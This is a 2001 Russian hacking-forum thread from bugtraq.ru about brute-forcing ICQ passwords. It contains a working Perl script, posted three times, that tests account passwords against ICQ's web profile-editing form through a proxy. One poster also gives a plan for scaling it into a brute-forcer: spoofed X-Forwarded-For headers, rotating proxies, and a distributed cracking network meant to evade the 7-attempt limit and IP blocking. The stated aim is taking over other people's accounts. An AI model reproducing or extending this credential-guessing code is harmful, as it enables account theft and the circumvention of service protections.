информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Портрет посетителяSpanning Tree Protocol: недокументированное применениеСтрашный баг в Windows
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Три миллиона электронных замков... 
 Doom на газонокосилках 
 Умер Никлаус Вирт 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / hacking
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
и что с этим текстом делать??? 30.11.01 15:42  Число просмотров: 1391
Автор: Natyral Статус: Незарегистрированный пользователь
<"чистая" ссылка>
#!/usr/local/bin/perl
############################################################
# Configuration
# Your proxy server
$host="127.0.0.1";
$host1="web.icq.com";
$port="3128";
$data_length=length($data);

$path="http://web.icq.com/whitepages/change_details/1,,,00.html";
############################################################

print <<END;
Content-Type: text/html\n\n

<html>
<head>
<title>ICQ Paasword Checker</title>
</head>
<body>
ICQ Paasword Checker<p>

END
############################################################

print "Proxy: $host<br>\n";
print "Port: $port<br>\n";
print "Path: $path<br>\n";
print "DataLength: $data_length\n";
print "Host asked to use: $host1<p>\n\n\n";

use IO::Socket;
my ($remote) = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port);
(die "can't connect: $!\n") unless scalar ($remote);

print $remote "POST $path HTTP/1.0\n";

print $remote "Accept: application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,/;
print $remote "Accept-Language: ru,en\n";
print $remote "Accept-Charset: windows-1251,koi8-r,iso-8859-5,cp866,*\n";
print $remote "Content-Type: application/x-www-form-urlencoded\n";
print $remote "Accept-Encoding: gzip, deflate\n";
print $remote "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)\n";
print $remote "Host: $host1\n";
print $remote "Content-Length: $data_length\n";
print $remote "Proxy-Connection: Keep-Alive\n";
print $remote "Pragma: no-cache\n";
print $remote "Cookie: KarmaLogin=C6E09CBAA76BF435CB6FDF422C303E38EC1320B416115CCF85DD5C56DFF0085790186AC50C7DEF805CEDADAC4EB5AAABBB5541B9; KarmaService4=Yes; uin=123456; KarmaLogin=C6E09CBAA7635CDE675AB6FDF422C303E38EC1320B416115CCF85DD5C56DFF0085790186AC50C7DF805CEDAD54EB5AAABBB5541B9; KarmaService4=Yes; uin=123456\n\n";

print $remote "uService=4&Uin=123456&Password=pas%20%20w&SEND=Submit";
# pas%20%20w - Пасс, "pas w"
# 123456 - номер аси

my (@lines) = <$remote>;
close $remote;

# print "@lines";

$error="1";
foreach $line (@lines) {
if ( $line =~ /Update Details of ICQ/ ){
$error=0;
}
}
if ($error == 1){
# Zapuskat programmu otsuda!
print "Error!\n";
foreach $line(@lines) {
print "$line";
}
}
else {
print "<h3>Result?!</h3>\n<br>";
foreach $line(@lines) {
print "$line";
}
}

############################################################
print <<END;

</html></body>

END
############################################################

1;

что с этим текстом делать?
<hacking>
ICQ/подбор паролей 28.11.01 13:39    Штраф: 10 [NiFi...]
Автор: iDM Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Использую ICQ SubMashineGun.
через icq1.mirabilis.com 4000-порт удается сделать только 7 попыток, затем постоянно timeout,relogin. Спустя какое то время можно сделать еще 7 попыток и т.д. Как убрать ограничение на количесво попыток?
Спасибо.
сорри 30.11.01 18:50  
Автор: amzuk <Kuzma> Статус: Member
Отредактировано 01.12.01 20:28  Количество правок: 1
<"чистая" ссылка>
и что с этим текстом делать??? 30.11.01 15:42  
Автор: Natyral Статус: Незарегистрированный пользователь
<"чистая" ссылка>
#!/usr/local/bin/perl
############################################################
# Configuration
# Your proxy server
$host="127.0.0.1";
$host1="web.icq.com";
$port="3128";
$data_length=length($data);

$path="http://web.icq.com/whitepages/change_details/1,,,00.html";
############################################################

print <<END;
Content-Type: text/html\n\n

<html>
<head>
<title>ICQ Paasword Checker</title>
</head>
<body>
ICQ Paasword Checker<p>

END
############################################################

print "Proxy: $host<br>\n";
print "Port: $port<br>\n";
print "Path: $path<br>\n";
print "DataLength: $data_length\n";
print "Host asked to use: $host1<p>\n\n\n";

use IO::Socket;
my ($remote) = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port);
(die "can't connect: $!\n") unless scalar ($remote);

print $remote "POST $path HTTP/1.0\n";

print $remote "Accept: application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,/;
print $remote "Accept-Language: ru,en\n";
print $remote "Accept-Charset: windows-1251,koi8-r,iso-8859-5,cp866,*\n";
print $remote "Content-Type: application/x-www-form-urlencoded\n";
print $remote "Accept-Encoding: gzip, deflate\n";
print $remote "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)\n";
print $remote "Host: $host1\n";
print $remote "Content-Length: $data_length\n";
print $remote "Proxy-Connection: Keep-Alive\n";
print $remote "Pragma: no-cache\n";
print $remote "Cookie: KarmaLogin=C6E09CBAA76BF435CB6FDF422C303E38EC1320B416115CCF85DD5C56DFF0085790186AC50C7DEF805CEDADAC4EB5AAABBB5541B9; KarmaService4=Yes; uin=123456; KarmaLogin=C6E09CBAA7635CDE675AB6FDF422C303E38EC1320B416115CCF85DD5C56DFF0085790186AC50C7DF805CEDAD54EB5AAABBB5541B9; KarmaService4=Yes; uin=123456\n\n";

print $remote "uService=4&Uin=123456&Password=pas%20%20w&SEND=Submit";
# pas%20%20w - Пасс, "pas w"
# 123456 - номер аси

my (@lines) = <$remote>;
close $remote;

# print "@lines";

$error="1";
foreach $line (@lines) {
if ( $line =~ /Update Details of ICQ/ ){
$error=0;
}
}
if ($error == 1){
# Zapuskat programmu otsuda!
print "Error!\n";
foreach $line(@lines) {
print "$line";
}
}
else {
print "<h3>Result?!</h3>\n<br>";
foreach $line(@lines) {
print "$line";
}
}

############################################################
print <<END;

</html></body>

END
############################################################

1;

что с этим текстом делать?
Распечатай и повесь на стену :) 30.11.01 16:19  
Автор: !mm <Ivan Ch.> Статус: Elderman
<"чистая" ссылка>
Что есть ПЕРЛ 30.11.01 16:23  
Автор: Natyral Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Уже распечатал и повесил, а что такое перл?
Сокр.:Перловая каша, поисковик тебе поможет 30.11.01 18:11  
Автор: NiFi... <NiFiGaSebe!> Статус: Member
<"чистая" ссылка>
ICQ/подбор паролей 30.11.01 14:27  
Автор: Necto Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> Использую ICQ SubMashineGun.
> через icq1.mirabilis.com 4000-порт удается сделать только
> 7 попыток, затем постоянно timeout,relogin. Спустя какое то
> время можно сделать еще 7 попыток и т.д. Как убрать
> ограничение на количесво попыток?
> Спасибо.

Незнаю конечно, я здесь написал свое мнение по поводу этой проги http://www.mazafaka.ru/forum/viewtopic.php?topic=67&forum=2&10
ICQ/подбор паролей-угадай кто этот ДЯДЯ?=) 07.12.01 20:17  
Автор: ud Статус: Незарегистрированный пользователь
Отредактировано 07.12.01 20:22  Количество правок: 1
<"чистая" ссылка>
> > Использую ICQ SubMashineGun.
> > через icq1.mirabilis.com 4000-порт удается сделать
> только
> > 7 попыток, затем постоянно timeout,relogin. Спустя
> какое то
> > время можно сделать еще 7 попыток и т.д. Как убрать
> > ограничение на количесво попыток?
> > Спасибо.
>
> Незнаю конечно, я здесь написал свое мнение по поводу этой
> проги
> http://www.mazafaka.ru/forum/viewtopic.php?topic=67&forum=2
> &10

=))))))))))
хыхы... удэшник, там в твоей мессаге 1 правка, это ты количество скобок в смайлике правил? :-))) 08.12.01 00:29  
Автор: hex.sex <Computer-Hitler> Статус: Elderman
<"чистая" ссылка>
ICQ/подбор паролей 28.11.01 14:41  
Автор: !mm <Ivan Ch.> Статус: Elderman
<"чистая" ссылка>
> время можно сделать еще 7 попыток и т.д. Как убрать
> ограничение на количесво попыток?

Там насколько я знаю стоит ограничение попыток. Т.е. бесполезно что-то делать.
ICQ/подбор паролей- Забудь об этом(ins) 29.11.01 03:53  
Автор: RHoST Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Да это действительно так, там стоит ограничение на 7 попыток. НО! Когда я писал летом свой переборщик, я сделал задержку между паролями регулируемой. Это позволяло перебирать пароли всю ночь
. но скорость получилась потрясающе низкая - 1 пароль в 2-3 секунды.
Несмотря на то что она написана на ЛОГИН пакете аськи 2000b.
СНИФ версии сабмашинГАНа которая была у меня показал что она юзает UDP пакеты без шифрования пароля, т.е старую версию протокола. Есст-но что это все убивает всякую мечту о брутфорсе.
Была идея подключаться через несколько прокси серверов, но руки так и не дошли. Все равно я писал ее для развлечения, поэтому она так и осталась в сыром состоянии.
Так что можешь забыть о переборе паролей. Слишком медленно будет. Если конечно ты не решишся на написание своего переборщика через 10 прокси серверов. ;)))
ICQ/подбор паролей- Не надо забывать об этом! 30.11.01 15:12  
Автор: NiFi... <NiFiGaSebe!> Статус: Member
Отредактировано 01.12.01 09:30  Количество правок: 2
<"чистая" ссылка>
Все это конечно хорошо, но зачем забывать о том, что можно делать логин
через веб, чтобы попытаться изменить свою инфу. Это значит, что написав
программу на перле, можно сделать переборщик, который будет очень
быстры. Если учитывать то, что эти идиоты даже не поставили проверку
на REFERER, то....
хммм...у меня нет слов.
Более того, айпишник не блокируется.
Дальше - дальнейшие навороты:
1) Посылаем в пакете каждый раз новое значение поля X-Forwarded 4. Это
заставит админов и возможно сам софт думать что запросы идут с
разных компов за прокси серваком.
2) Дальше, дописываем скрипт так, чтобы он был мультиконнектным и
сразу через несколько проксей проверял. Скорость увеличится как
говорится dramatically.
3) Разрабатываем distributed сеть. Еще сложнее, но увеличит скорость еще
в несколько раз. Это когда перл скрипт установлен на многих компах,...
и списки пассов, которые надо проверить собираются с главного сервера.
Если все это исполнить, то сосать будет не только тот, чью аську
скоммуниздили, но и администраторы мираба.
ПОСЛЕСЛОВИЕ: Не забываем, что у паролей для аси - ограниченный
размер. Это делает брутфорс - реальным занятием.
НО! Все предложенные модернизации требуют много умственных и
физических усилий, и создается вопрос: А НАДО ЛИ ОНО НАМ ВООБЩЕ???

Для того, чтобы доказать, что это пашет, я написал простой Перл скрипт,
который проверяет, правильный ли пароль для эккаунта или нет.
Простой Брутфорсер из этого скрипта сделать несложно - достаточно
всего лишь приделать туда модуль генерации паролей.

Листинг:
======================= Кат @#$ ==========================
#!/usr/local/bin/perl
############################################################
# Configuration
# Your proxy server
$host="127.0.0.1";
$host1="web.icq.com";
$port="3128";

$data="uService=4&Uin=123456&Password=pas%20%20w&SEND=Submit";
# pas%20%20w - Пасс, "pas  w"
# 123456 - номер аси

$data_length=length($data);
$path="http://web.icq.com/whitepages/change_details/1,,,00.html";
############################################################

print <<END;
Content-Type: text/html\n\n

<html>
 <head>
  <title>ICQ Paasword Checker</title>
 </head>
<body>
ICQ Paasword Checker<p>

END
############################################################

print "Proxy: $host<br>\n";
print "Port: $port<br>\n";
print "Path: $path<br>\n";
print "DataLength: $data_length\n";
print "Host asked to use: $host1<p>\n\n\n";

use IO::Socket;
my ($remote) = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port);
(die "can't connect: $!\n") unless scalar ($remote);

print $remote "POST $path HTTP/1.0\n";

print $remote "Accept: application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,/;
print $remote "Accept-Language: ru,en\n";
print $remote "Accept-Charset: windows-1251,koi8-r,iso-8859-5,cp866,*\n";
print $remote "Content-Type: application/x-www-form-urlencoded\n";
print $remote "Accept-Encoding: gzip, deflate\n";
print $remote "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)\n";
print $remote "Host: $host1\n";
print $remote "Content-Length: $data_length\n";
print $remote "Proxy-Connection: Keep-Alive\n";
print $remote "Pragma: no-cache\n";
print $remote "Cookie: KarmaLogin=C6E09CBAA76BF435CB6FDF422C303E38EC1320B416115CCF85DD5C56DFF0085790186AC50C7DEF805CEDADAC4EB5AAABBB5541B9; KarmaService4=Yes; uin=123456; KarmaLogin=C6E09CBAA7635CDE675AB6FDF422C303E38EC1320B416115CCF85DD5C56DFF0085790186AC50C7DF805CEDAD54EB5AAABBB5541B9; KarmaService4=Yes; uin=123456\n\n";

print $remote "$data";

my (@lines) = <$remote>;
close $remote;

$error=1;
foreach $line (@lines) {
	if ( $line =~ /Update Details of ICQ/ ){
		$error=0;
	}
}
if ($error == 1){
	print "Error!\n";
	foreach $line(@lines) {
	    print "$line";
    }
}
else {
	print "<h3>Result?!</h3>\n<br>";
	print "Definitely positive!\n<br>";
}

############################################################
print <<END;

</html></body>

END
############################################################

1;

---
======================= Кат @#$ ==========================


> Да это действительно так, там стоит ограничение на 7
> попыток. НО! Когда я писал летом свой переборщик, я сделал
> задержку между паролями регулируемой. Это позволяло
> перебирать пароли всю ночь
> . но скорость получилась потрясающе низкая - 1 пароль в 2-3
> секунды.
> Несмотря на то что она написана на ЛОГИН пакете аськи
> 2000b.
> СНИФ версии сабмашинГАНа которая была у меня показал что
> она юзает UDP пакеты без шифрования пароля, т.е старую
> версию протокола. Есст-но что это все убивает всякую мечту
> о брутфорсе.
> Была идея подключаться через несколько прокси серверов, но
> руки так и не дошли. Все равно я писал ее для развлечения,
> поэтому она так и осталась в сыром состоянии.
> Так что можешь забыть о переборе паролей. Слишком медленно
> будет. Если конечно ты не решишся на написание своего
> переборщика через 10 прокси серверов. ;)))
ICQ/подбор паролей- Не надо забывать об этом! 30.11.01 16:14  
Автор: !mm <Ivan Ch.> Статус: Elderman
<"чистая" ссылка>
> > Была идея подключаться через несколько прокси
> серверов, но
> > руки так и не дошли. Все равно я писал ее для
> развлечения,
> > поэтому она так и осталась в сыром состоянии.
> > Так что можешь забыть о переборе паролей. Слишком
> медленно
> > будет. Если конечно ты не решишся на написание своего
> > переборщика через 10 прокси серверов. ;)))

> Все это конечно хорошо, но зачем забывать о том, что можно
> делать логин
> через веб, чтоб попытаться изменить свою инфу. Это значит,
> что написав
> программу на перле, можно сделать переборщик, который будет
> очень

:))) Два диаметрально противоположных мнения :))) Душа радуется, когда за дело берутся профессионалы :)

P.S. прога на Перле действительно быстра.. Тока я ее чуть поправил :)
Сенькс.
ICQ/подбор паролей- Не надо забывать об этом! 01.12.01 09:33  
Автор: NiFi... <NiFiGaSebe!> Статус: Member
<"чистая" ссылка>
> P.S. прога на Перле действительно быстра..

>Тока я ее чуть поправил :)
да уж. я впопыхах там несколько вещей исказил, зато сейчас все поправил так как должно быть.
Интересно, а что поправлял ты?

> Сенькс.
Да не за что. Писал давно, нужно было при кое-каких экспермиентах быстро проверять подходит ли пасс или нет, ломало каждый раз в бравзере самому проверять или тем более через саму асю.
ICQ/подбор паролей- Не надо забывать об этом! 01.12.01 02:22  
Автор: petka Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> > > Была идея подключаться через несколько прокси
> > серверов, но
> > > руки так и не дошли. Все равно я писал ее для
> > развлечения,
> > > поэтому она так и осталась в сыром состоянии.
> > > Так что можешь забыть о переборе паролей. Слишком
> > медленно
> > > будет. Если конечно ты не решишся на написание
> своего
> > > переборщика через 10 прокси серверов. ;)))
>
> > Все это конечно хорошо, но зачем забывать о том, что
> можно
> > делать логин
> > через веб, чтоб попытаться изменить свою инфу. Это
> значит,
> > что написав
> > программу на перле, можно сделать переборщик, который
> будет
> > очень
>
> :))) Два диаметрально противоположных мнения :))) Душа
> радуется, когда за дело берутся профессионалы :)
>
> P.S. прога на Перле действительно быстра.. Тока я ее чуть
> поправил :)
> Сенькс.

Что то у меня етот скрипт не пашет, выскакивает на ету строчку все время ((die "can't connect: $!\n") unless scalar ($remote);), народ в чем могет быть трабла, а то я сам с перлом на вы.
Icq/подбор паролей- нет! все-таки надо забыть об этом! 01.12.01 09:04  
Автор: NiFi... <NiFiGaSebe!> Статус: Member
<"чистая" ссылка>
> Что то у меня етот скрипт не пашет, выскакивает на ету
> строчку все время ((die "can't connect: $!\n") unless
> scalar ($remote);), народ в чем могет быть трабла, а то я
> сам с перлом на вы.
Ну начинается...
Не знаешь, возьми книжки, почитай. Я выложил готовое решение,
и тут еще тупые вопросы начинаются.
Сам подумай, что значит эта ошибка и как ее исправить. Для этого знания перла не нужны.

Все, закрываю это обсуждение.
1




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2024 Dmitry Leonov   Page build time: 1 s   Design: Vadim Derkach